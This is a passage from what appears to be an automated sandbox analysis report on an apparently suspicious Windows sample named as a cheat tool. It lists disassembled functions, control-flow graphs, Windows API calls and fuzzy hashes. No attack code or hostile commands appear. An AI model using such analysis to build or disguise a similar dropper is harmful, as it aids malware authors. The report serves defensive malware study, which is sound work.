                                                    control_flow_graph 993 cf98e0-cf9901 call d0ec50 996 cf990c 993->996 997 cf9903-cf9906 993->997 999 cf990e-cf991f 996->999 997->996 998 cf9908-cf990a 997->998 998->999 1000 cf9927-cf9931 999->1000 1001 cf9921 999->1001 1002 cf9936-cf9943 call cf6edb 1000->1002 1003 cf9933 1000->1003 1001->1000 1006 cf994b-cf996a CreateFileW 1002->1006 1007 cf9945 1002->1007 1003->1002 1008 cf996c-cf998e GetLastError call cfbb03 1006->1008 1009 cf99bb-cf99bf 1006->1009 1007->1006 1014 cf99c8-cf99cd 1008->1014 1015 cf9990-cf99b3 CreateFileW GetLastError 1008->1015 1011 cf99c3-cf99c6 1009->1011 1013 cf99d9-cf99de 1011->1013 1011->1014 1017 cf99ff-cf9a10 1013->1017 1018 cf99e0-cf99e3 1013->1018 1014->1013 1016 cf99cf 1014->1016 1015->1011 1021 cf99b5-cf99b9 1015->1021 1016->1013 1019 cf9a2e-cf9a39 1017->1019 1020 cf9a12-cf9a2a call d00602 1017->1020 1018->1017 1022 cf99e5-cf99f9 SetFileTime 1018->1022 1020->1019 1021->1011 1022->1017
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CF7760,?,00000005,?,00000011), ref: 00CF995F
                                                    • GetLastError.KERNEL32(?,?,00CF7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CF996C
                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CF7760,?,00000005,?), ref: 00CF99A2
                                                    • GetLastError.KERNEL32(?,?,00CF7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CF99AA
                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CF7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CF99F9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast$Time
                                                    • String ID:
                                                    • API String ID: 1999340476-0
                                                    • Opcode ID: 595bbafc1ab4cfcb4f8d4f1e4defdbbd408cc99059adc9e6854e744e61bb8368
                                                    • Instruction ID: f58d18bcaa8a5f9626fcc30db33e021ae21ba932b935471cf01ae9865cf2be32
                                                    • Opcode Fuzzy Hash: 595bbafc1ab4cfcb4f8d4f1e4defdbbd408cc99059adc9e6854e744e61bb8368
                                                    • Instruction Fuzzy Hash: 1231F2305443496BEB309F24CD45BAABB94FB05320F100B19F6B9961D0D3F59B45CBA2
                                                    Function 00D0B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1052 d0b568-d0b581 PeekMessageW 1053 d0b583-d0b597 GetMessageW 1052->1053 1054 d0b5bc-d0b5be 1052->1054 1055 d0b5a8-d0b5b6 TranslateMessage DispatchMessageW 1053->1055 1056 d0b599-d0b5a6 IsDialogMessageW 1053->1056 1055->1054 1056->1054 1056->1055
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D0B579
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0B58A
                                                    • IsDialogMessageW.USER32(000103DE,?), ref: 00D0B59E
                                                    • TranslateMessage.USER32(?), ref: 00D0B5AC
                                                    • DispatchMessageW.USER32(?), ref: 00D0B5B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 1266772231-0
                                                    • Opcode ID: 5672498c453d83641c0682936ddd184bf2a75f124138ff263dbfe81e0af3aa00
                                                    • Instruction ID: a7c4d09a0859db5336c28191b1e3cd2c858bc65dbd920a0465b2ed6a4471b7fc
                                                    • Opcode Fuzzy Hash: 5672498c453d83641c0682936ddd184bf2a75f124138ff263dbfe81e0af3aa00
                                                    • Instruction Fuzzy Hash: 55F0D071A0131AABCB209FE5DC4CEDB7FBCEE053A17044415B919D2190EB34D605CBB0
                                                    Function 00D0ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1057 d0abab-d0abca GetClassNameW 1058 d0abf2-d0abf4 1057->1058 1059 d0abcc-d0abe1 call d01fbb 1057->1059 1060 d0abf6-d0abf9 SHAutoComplete 1058->1060 1061 d0abff-d0ac01 1058->1061 1064 d0abf1 1059->1064 1065 d0abe3-d0abef FindWindowExW 1059->1065 1060->1061 1064->1058 1065->1064
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00D0ABC2
                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D0ABF9
                                                      • Part of subcall function 00D01FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CFC116,00000000,.exe,?,?,00000800,?,?,?,00D08E3C), ref: 00D01FD1
                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D0ABE9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                    • String ID: EDIT
                                                    • API String ID: 4243998846-3080729518
                                                    • Opcode ID: dba1cbcaaa0a5a6625b9a2b518ddf8af2138196a1c70f31ec4990c6b846c1a5b
                                                    • Instruction ID: d1889c9e09d3654a9f10aa59db6b4440f86b17ff7fe543eb12aa7bab80ca1060
                                                    • Opcode Fuzzy Hash: dba1cbcaaa0a5a6625b9a2b518ddf8af2138196a1c70f31ec4990c6b846c1a5b
                                                    • Instruction Fuzzy Hash: 92F0823260032976DB205A299C09FDB776C9F46B91F484011BE09E32C0D760DA4186B6
                                                    Function 00D0AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00D0081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D00836
                                                      • Part of subcall function 00D0081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CFF2D8,Crypt32.dll,00000000,00CFF35C,?,?,00CFF33E,?,?,?), ref: 00D00858
                                                    • OleInitialize.OLE32(00000000), ref: 00D0AC2F
                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D0AC66
                                                    • SHGetMalloc.SHELL32(00D38438), ref: 00D0AC70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                    • String ID: riched20.dll
                                                    • API String ID: 3498096277-3360196438
                                                    • Opcode ID: aad11414b5c01339a02fe6feec6096bc45f2d89ac8dc3c49cb0e28c0e9045709
                                                    • Instruction ID: fe6d9542a4fd80424ec410875a37efca28793180d29fda641f14741833286301
                                                    • Opcode Fuzzy Hash: aad11414b5c01339a02fe6feec6096bc45f2d89ac8dc3c49cb0e28c0e9045709
                                                    • Instruction Fuzzy Hash: 67F0F4B1900309ABCB10AFA9D849AEFFFFCEF94745F00415AA815E2281DBB456058BB1
                                                    Function 00D0DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1070 d0dbde-d0dc09 call d0ec50 SetEnvironmentVariableW call d00371 1074 d0dc0e-d0dc12 1070->1074 1075 d0dc14-d0dc18 1074->1075 1076 d0dc36-d0dc38 1074->1076 1077 d0dc21-d0dc28 call d0048d 1075->1077 1080 d0dc1a-d0dc20 1077->1080 1081 d0dc2a-d0dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1076
                                                    APIs
                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D0DBF4
                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D0DC30
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID: sfxcmd$sfxpar
                                                    • API String ID: 1431749950-3493335439
                                                    • Opcode ID: 88ba7377d1865f568138fe51829cf64fa6395f63daf44b8acded0bc3d688f6cd
                                                    • Instruction ID: c3e1753ef11044312f4c5fe1210302b4a6946bfccaae67bf351ad96953266a0e
                                                    • Opcode Fuzzy Hash: 88ba7377d1865f568138fe51829cf64fa6395f63daf44b8acded0bc3d688f6cd
                                                    • Instruction Fuzzy Hash: 77F0A7724053347ADB211BD49C06FBA3B59EF18781B080411BD8D961D5D6B48950D6B4
                                                    Function 00CF9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1082 cf9785-cf9791 1083 cf979e-cf97b5 ReadFile 1082->1083 1084 cf9793-cf979b GetStdHandle 1082->1084 1085 cf97b7-cf97c0 call cf98bc 1083->1085 1086 cf9811 1083->1086 1084->1083 1090 cf97d9-cf97dd 1085->1090 1091 cf97c2-cf97ca 1085->1091 1088 cf9814-cf9817 1086->1088 1093 cf97df-cf97e8 GetLastError 1090->1093 1094 cf97ee-cf97f2 1090->1094 1091->1090 1092 cf97cc 1091->1092 1095 cf97cd-cf97d7 call cf9785 1092->1095 1093->1094 1096 cf97ea-cf97ec 1093->1096 1097 cf980c-cf980f 1094->1097 1098 cf97f4-cf97fc 1094->1098 1095->1088 1096->1088 1097->1088 1098->1097 1100 cf97fe-cf9807 GetLastError 1098->1100 1100->1097 1102 cf9809-cf980a 1100->1102 1102->1095
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00CF9795
                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CF97AD
                                                    • GetLastError.KERNEL32 ref: 00CF97DF
                                                    • GetLastError.KERNEL32 ref: 00CF97FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FileHandleRead
                                                    • String ID:
                                                    • API String ID: 2244327787-0
                                                    • Opcode ID: b4a181d2d0246e1bb54952190b5bd8117a819f853899721e8d69934becd1bfb3
                                                    • Instruction ID: 6b651922d0dae8b891c535fc99f8b5fce99a0ca1f1bff632cf8b12afd074194a
                                                    • Opcode Fuzzy Hash: b4a181d2d0246e1bb54952190b5bd8117a819f853899721e8d69934becd1bfb3
                                                    • Instruction Fuzzy Hash: ED115E30914308ABDFA16F65C804B7937A9FB523A0F10852AE626C6290D7749B849B63
                                                    Function 00D1AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00CFD710,00000000,00000000,?,00D1ACDB,00CFD710,00000000,00000000,00000000,?,00D1AED8,00000006,FlsSetValue), ref: 00D1AD66
                                                    • GetLastError.KERNEL32(?,00D1ACDB,00CFD710,00000000,00000000,00000000,?,00D1AED8,00000006,FlsSetValue,00D27970,FlsSetValue,00000000,00000364,?,00D198B7), ref: 00D1AD72
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D1ACDB,00CFD710,00000000,00000000,00000000,?,00D1AED8,00000006,FlsSetValue,00D27970,FlsSetValue,00000000), ref: 00D1AD80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 671d52c0bc7842438a98603282e706169053644c1f516711a98640b824806c56
                                                    • Instruction ID: eec994346446f23b002e88d2545fc5d5298f1a531738d6ba26a82b38f32ad599
                                                    • Opcode Fuzzy Hash: 671d52c0bc7842438a98603282e706169053644c1f516711a98640b824806c56
                                                    • Instruction Fuzzy Hash: 0401FC36302722BBC7314E6CBC44AD77B58EF157637150620F906D7650EF24D94186F1
                                                    Function 00CF9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CFD343,00000001,?,?,?,00000000,00D0551D,?,?,?), ref: 00CF9F9E
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00D0551D,?,?,?,?,?,00D04FC7,?), ref: 00CF9FE5
                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CFD343,00000001,?,?), ref: 00CFA011
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$Handle
                                                    • String ID:
                                                    • API String ID: 4209713984-0
                                                    • Opcode ID: a321cc3a03cc49874df0056a00f3b0dd4f6d7821c7c98a47c1c575a69db84c48
                                                    • Instruction ID: 1d8734f8ff1a212fdc3b543c14da66fb0b5e4552e36258f76cdcf076a359281d
                                                    • Opcode Fuzzy Hash: a321cc3a03cc49874df0056a00f3b0dd4f6d7821c7c98a47c1c575a69db84c48
                                                    • Instruction Fuzzy Hash: 9831C27120430AAFDB58CF20E808B7EB7A5EF84714F004519FA5697290CB759E49CBA3
                                                    Function 00CFA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CFC27E: _wcslen.LIBCMT ref: 00CFC284
                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA2D9
                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA30C
                                                    • GetLastError.KERNEL32(?,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA329
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                    • String ID:
                                                    • API String ID: 2260680371-0
                                                    • Opcode ID: ddd48cc89928ddbd640b8bbcbaada5d7b1d81a20a4d8b7378601d69d9a058d46
                                                    • Instruction ID: c2faa681cb23f6026dd9abde7b3cf3b2c9306f1b5dc4c1a47a09ff5e7e391cb7
                                                    • Opcode Fuzzy Hash: ddd48cc89928ddbd640b8bbcbaada5d7b1d81a20a4d8b7378601d69d9a058d46
                                                    • Instruction Fuzzy Hash: 050128B520021C6AEFB1AF714C49BFDB3889F09380F044414FB19D21A5D758CB85D6B7
                                                    Function 00D1B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D1B8B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Info
                                                    • String ID:
                                                    • API String ID: 1807457897-3916222277
                                                    • Opcode ID: 0765aafa82285d8009982097135c86fff78f4b9ed4352fd77e71ac67d2d59ca1
                                                    • Instruction ID: 00ca7c71d473d295e5aefa05ed093e4bd650b1d16a5514697556fef7c3bfb1e2
                                                    • Opcode Fuzzy Hash: 0765aafa82285d8009982097135c86fff78f4b9ed4352fd77e71ac67d2d59ca1
                                                    • Instruction Fuzzy Hash: E141087050438CAADB228E689C84BF6BBEDDF55314F1804EEE5DA86142D7359A86CF70
                                                    Function 00D1AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00D1AFDD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: String
                                                    • String ID: LCMapStringEx
                                                    • API String ID: 2568140703-3893581201
                                                    • Opcode ID: e47fc0e1e5b40a78e9e361edceb36d22dcf01b95a5446f3ffe736ab73e2a6a23
                                                    • Instruction ID: 0eb817435bbb963a7dd5a54fdfc18454e89c2caf8a1bdc6aa0c3a78614c5d755
                                                    • Opcode Fuzzy Hash: e47fc0e1e5b40a78e9e361edceb36d22dcf01b95a5446f3ffe736ab73e2a6a23
                                                    • Instruction Fuzzy Hash: 08011732505219BBCF125F94EC01DEE7F62EF18754F014154FE1466260CA368A72EBA1
                                                    Function 00D1AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D1A56F), ref: 00D1AF55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalInitializeSectionSpin
                                                    • String ID: InitializeCriticalSectionEx
                                                    • API String ID: 2593887523-3084827643
                                                    • Opcode ID: aa2a1a74ac46cae973693e06114ec9beeb900caff930ce5bf8d411a6400ca547
                                                    • Instruction ID: 410623261478760c92580e0957b4950a1f2330fcdf1c967e160684793f33263d
                                                    • Opcode Fuzzy Hash: aa2a1a74ac46cae973693e06114ec9beeb900caff930ce5bf8d411a6400ca547
                                                    • Instruction Fuzzy Hash: 7FF0B431A46318BFCB225F54EC06DAE7F61EF14711B004094FC0896360DE714A519BF5
                                                    Function 00D1ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
